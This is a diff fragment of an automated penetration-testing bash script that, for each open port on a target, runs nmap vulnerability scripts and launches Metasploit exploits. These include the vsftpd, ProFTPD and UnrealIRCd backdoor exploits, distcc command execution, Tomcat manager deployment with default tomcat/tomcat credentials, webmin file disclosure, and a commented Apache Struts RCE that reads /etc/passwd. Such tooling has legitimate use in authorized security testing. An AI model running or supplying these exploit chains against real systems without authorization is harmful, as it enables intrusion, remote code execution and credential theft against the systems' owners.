echo -e "$OKORANGE + -- --=[Port 1433 opened... running tests...$RESET"
nmap -A -sV -T5 --script=mssql* -p 1433 $TARGET
nmap -A -sV -T5 --script=ms-sql* -p 1433 $TARGET
fi
if [ -z "$port_2049" ];
@@ -1104,7 +1136,7 @@ then
echo -e "$OKRED + -- --=[Port 2049 closed... skipping.$RESET"
else
echo -e "$OKORANGE + -- --=[Port 2049 opened... running tests...$RESET"
nmap -A -sV -T5 --script=nfs* -p 2049 $TARGET
nmap -A -sV -T5 --script=nfs* -p 2049 $TARGET
rpcinfo -p $TARGET
showmount -e $TARGET
smbclient -L $TARGET -U " "%" "
@@ -1115,7 +1147,7 @@ then
echo -e "$OKRED + -- --=[Port 2121 closed... skipping.$RESET"
else
echo -e "$OKORANGE + -- --=[Port 2121 opened... running tests...$RESET"
nmap -A -sV -T5 --script=ftp* -p 2121 $TARGET
nmap -A -sV -T5 --script=ftp* -p 2121 $TARGET
msfconsole -x "setg PORT 2121; use exploit/unix/ftp/vsftpd_234_backdoor; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; run; use unix/ftp/proftpd_133c_backdoor; run; exit;"
fi
@@ -1124,7 +1156,7 @@ then
echo -e "$OKRED + -- --=[Port 3306 closed... skipping.$RESET"
else
echo -e "$OKORANGE + -- --=[Port 3306 opened... running tests...$RESET"
nmap -A -sV --script=mysql* -p 3306 $TARGET
nmap -A -sV --script=mysql* -p 3306 $TARGET
mysql -u root -h $TARGET -e 'SHOW DATABASES; SELECT Host,User,Password FROM mysql.user;'
fi
@@ -1133,7 +1165,7 @@ then
echo -e "$OKRED + -- --=[Port 3310 closed... skipping.$RESET"
else
echo -e "$OKORANGE + -- --=[Port 3310 opened... running tests...$RESET"
nmap -A -p 3310 -T5 -sV --script clamav-exec $TARGET
nmap -A -p 3310 -T5 -sV --script clamav-exec $TARGET
fi
if [ -z "$port_3128" ];
@@ -1141,7 +1173,7 @@ then
echo -e "$OKRED + -- --=[Port 3128 closed... skipping.$RESET"
else
echo -e "$OKORANGE + -- --=[Port 3128 opened... running tests...$RESET"
nmap -A -p 3128 -T5 -sV --script=*proxy* $TARGET
nmap -A -p 3128 -T5 -sV --script=*proxy* $TARGET
fi
if [ -z "$port_3389" ];
@@ -1149,7 +1181,7 @@ then
echo -e "$OKRED + -- --=[Port 3389 closed... skipping.$RESET"
else
echo -e "$OKORANGE + -- --=[Port 3389 opened... running tests...$RESET"
nmap -A -sV -T5 --script=rdp-* -p 3389 $TARGET
nmap -A -sV -T5 --script=rdp-* -p 3389 $TARGET
rdesktop $TARGET &
fi
@@ -1158,7 +1190,7 @@ then
echo -e "$OKRED + -- --=[Port 3632 closed... skipping.$RESET"
else
echo -e "$OKORANGE + -- --=[Port 3632 opened... running tests...$RESET"
nmap -A -sV -T5 --script=distcc-* -p 3632 $TARGET
nmap -A -sV -T5 --script=distcc-* -p 3632 $TARGET
msfconsole -x "setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; use unix/misc/distcc_exec; run; exit;"
fi
@@ -1179,7 +1211,7 @@ else
cd $INSTALL_DIR
nikto -h https://$TARGET:4443
cutycapt --url=https://$TARGET:4443 --out=$LOOT_DIR/screenshots/$TARGET-port4443.jpg
nmap -A -p 4443 -T5 --script=*proxy* $TARGET
nmap -sV -A -p 4443 -T5 --script=*proxy* $TARGET
fi
if [ -z "$port_5432" ];
@@ -1187,7 +1219,7 @@ then
echo -e "$OKRED + -- --=[Port 5432 closed... skipping.$RESET"
else
echo -e "$OKORANGE + -- --=[Port 5432 opened... running tests...$RESET"
nmap -A -sV --script=pgsql-brute -p 5432 $TARGET
nmap -A -sV --script=pgsql-brute -p 5432 $TARGET
fi
if [ -z "$port_5800" ];
@@ -1195,7 +1227,7 @@ then
echo -e "$OKRED + -- --=[Port 5800 closed... skipping.$RESET"
else
echo -e "$OKORANGE + -- --=[Port 5800 opened... running tests...$RESET"
nmap -A -sV -T5 --script=vnc* -p 5800 $TARGET
nmap -A -sV -T5 --script=vnc* -p 5800 $TARGET
fi
if [ -z "$port_5900" ];
@@ -1203,7 +1235,16 @@ then
echo -e "$OKRED + -- --=[Port 5900 closed... skipping.$RESET"
else
echo -e "$OKORANGE + -- --=[Port 5900 opened... running tests...$RESET"
nmap -A -sV -T5 --script=vnc* -p 5900 $TARGET
nmap -A -sV -T5 --script=vnc* -p 5900 $TARGET
fi
if [ -z "$port_5984" ];
then
echo -e "$OKRED + -- --=[Port 5984 closed... skipping.$RESET"
else
echo -e "$OKORANGE + -- --=[Port 5984 opened... running tests...$RESET"
nmap -A -sV -T5 --script=couchdb* -p 5984 $TARGET
msfconsole -x "use auxiliary/scanner/couchdb/couchdb_enum; set RHOST "$TARGET"; run; exit;"
fi
if [ -z "$port_6000" ];
@@ -1211,7 +1252,8 @@ then
echo -e "$OKRED + -- --=[Port 6000 closed... skipping.$RESET"
else
echo -e "$OKORANGE + -- --=[Port 6000 opened... running tests...$RESET"
nmap -A -sV -T5 --script=x11* -p 6000 $TARGET
nmap -A -sV -T5 --script=x11* -p 6000 $TARGET
msfconsole -x "use auxiliary/scanner/x11/open_x11; set RHOSTS "$TARGET"; exploit;"
fi
if [ -z "$port_6667" ];
@@ -1219,7 +1261,7 @@ then
echo -e "$OKRED + -- --=[Port 6667 closed... skipping.$RESET"
else
echo -e "$OKORANGE + -- --=[Port 6667 opened... running tests...$RESET"
nmap -A -sV -T5 --script=irc* -p 6667 $TARGET
nmap -A -sV -T5 --script=irc* -p 6667 $TARGET
msfconsole -x "use unix/irc/unreal_ircd_3281_backdoor; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; run; exit;"
fi
@@ -1236,6 +1278,7 @@ else
cd ..
nikto -h http://$TARGET:8000
cutycapt --url=http://$TARGET:8000 --out=$LOOT_DIR/screenshots/$TARGET-port8000.jpg
nmap -sV --script=/usr/share/nmap/scripts/http-vuln-cve2017-5638.nse -A -p 8000 -T5 $TARGET
fi
if [ -z "$port_8100" ];
@@ -1254,6 +1297,7 @@ else
cd $INSTALL_DIR
nikto -h http://$TARGET:8100
cutycapt --url=http://$TARGET:8100 --out=$LOOT_DIR/screenshots/$TARGET-port8100.jpg
nmap -sV --script=/usr/share/nmap/scripts/http-vuln-cve2017-5638.nse -A -p 8100 -T5 $TARGET
fi
if [ -z "$port_8080" ];
@@ -1272,7 +1316,7 @@ else
cd $INSTALL_DIR
nikto -h http://$TARGET:8080
cutycapt --url=http://$TARGET:8080 --out=$LOOT_DIR/screenshots/$TARGET-port8080.jpg
nmap -A -p 8080 -T5 --script=*proxy* $TARGET
nmap -sV --script=/usr/share/nmap/scripts/http-vuln-cve2017-5638.nse -A -p 8080 -T5 --script=*proxy* $TARGET
msfconsole -x "use admin/http/tomcat_administration; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; setg RPORT 8080; run; use admin/http/tomcat_utf8_traversal; run; use scanner/http/tomcat_enum; run; use scanner/http/tomcat_mgr_login; run; use multi/http/tomcat_mgr_deploy; run; use multi/http/tomcat_mgr_upload; set USERNAME tomcat; set PASSWORD tomcat; run; exit;"
# EXPERIMENTAL - APACHE STRUTS RCE EXPLOIT
# msfconsole -x "use exploit/linux/http/apache_struts_rce_2016-3081; setg RHOSTS "$TARGET"; set PAYLOAD linux/x86/read_file; set PATH /etc/passwd; run;"
@@ -1295,7 +1339,7 @@ else
cd $INSTALL_DIR
nikto -h http://$TARGET:8180
cutycapt --url=http://$TARGET:8180 --out=$LOOT_DIR/screenshots/$TARGET-port8180.jpg
nmap -p 8180 -T5 --script=*proxy* $TARGET
nmap -sV --script=/usr/share/nmap/scripts/http-vuln-cve2017-5638.nse -p 8180 -T5 --script=*proxy* $TARGET
echo -e "$OKGREEN + -- ----------------------------=[Launching Webmin File Disclosure Exploit]= -- +$RESET"
echo -e "$OKGREEN + -- ----------------------------=[Launching Tomcat Exploits]=--------------- -- +$RESET"
msfconsole -x "use admin/http/tomcat_administration; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; setg RPORT 8180; run; use admin/http/tomcat_utf8_traversal; run; use scanner/http/tomcat_enum; run; use scanner/http/tomcat_mgr_login; run; use multi/http/tomcat_mgr_deploy; run; use multi/http/tomcat_mgr_upload; set USERNAME tomcat; set PASSWORD tomcat; run; exit;"
@@ -1318,7 +1362,7 @@ else
cd $INSTALL_DIR
nikto -h https://$TARGET:8443
cutycapt --url=https://$TARGET:8443 --out=$LOOT_DIR/screenshots/$TARGET-port8443.jpg
nmap -A -p 8443 -T5 --script=*proxy* $TARGET
nmap -sV --script=/usr/share/nmap/scripts/http-vuln-cve2017-5638.nse -A -p 8443 -T5 --script=*proxy* $TARGET
fi
if [ -z "$port_8888" ];
@@ -1333,6 +1377,7 @@ else
xsstracer $TARGET 8888
nikto -h http://$TARGET:8888
cutycapt --url=https://$TARGET:8888 --out=$LOOT_DIR/screenshots/$TARGET-port8888.jpg
nmap -sV --script=/usr/share/nmap/scripts/http-vuln-cve2017-5638.nse -A -p 8888 -T5 $TARGET
fi
if [ -z "$port_10000" ];
@@ -1345,6 +1390,38 @@ else
msfconsole -x "use auxiliary/admin/webmin/file_disclosure; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; run; exit;"
fi
if [ -z "$port_27017" ];
then
echo -e "$OKRED + -- --=[Port 27017 closed... skipping.$RESET"
else
echo -e "$OKORANGE + -- --=[Port 27017 opened... running tests...$RESET"
nmap -sV --script -p 27017 -T5 --script=mongodb* $TARGET
fi
if [ -z "$port_27018" ];
then
echo -e "$OKRED + -- --=[Port 27018 closed... skipping.$RESET"
else
echo -e "$OKORANGE + -- --=[Port 27018 opened... running tests...$RESET"
nmap -sV -p 27018 -T5 --script=mongodb* $TARGET
fi
if [ -z "$port_27019" ];
then
echo -e "$OKRED + -- --=[Port 27019 closed... skipping.$RESET"
else
echo -e "$OKORANGE + -- --=[Port 27019 opened... running tests...$RESET"
nmap -sV -p 27019 -T5 --script=mongodb* $TARGET
fi
if [ -z "$port_28017" ];
then
echo -e "$OKRED + -- --=[Port 28017 closed... skipping.$RESET"
else
echo -e "$OKORANGE + -- --=[Port 28017 opened... running tests...$RESET"
nmap -sV -p 28017 -T5 --script=mongodb* $TARGET
fi
if [ -z "$port_49152" ];
then
echo -e "$OKRED + -- --=[Port 49152 closed... skipping.$RESET"
@@ -1362,7 +1439,7 @@ if [ "$FULLNMAPSCAN" = "0" ]; then
echo -e "$OKGREEN + -- ----------------------------=[Skipping Full NMap Port Scan]=------------ -- +$RESET"
else
echo -e "$OKGREEN + -- ----------------------------=[Performing Full NMap Port Scan]=---------- -- +$RESET"
nmap -T4 -sV -O -v -p 1-65355 $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET.xml
nmap -T4 -sV -O -v -p 1-65355 $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET.xml
fi
if [ "$AUTOBRUTE" = "0" ]; then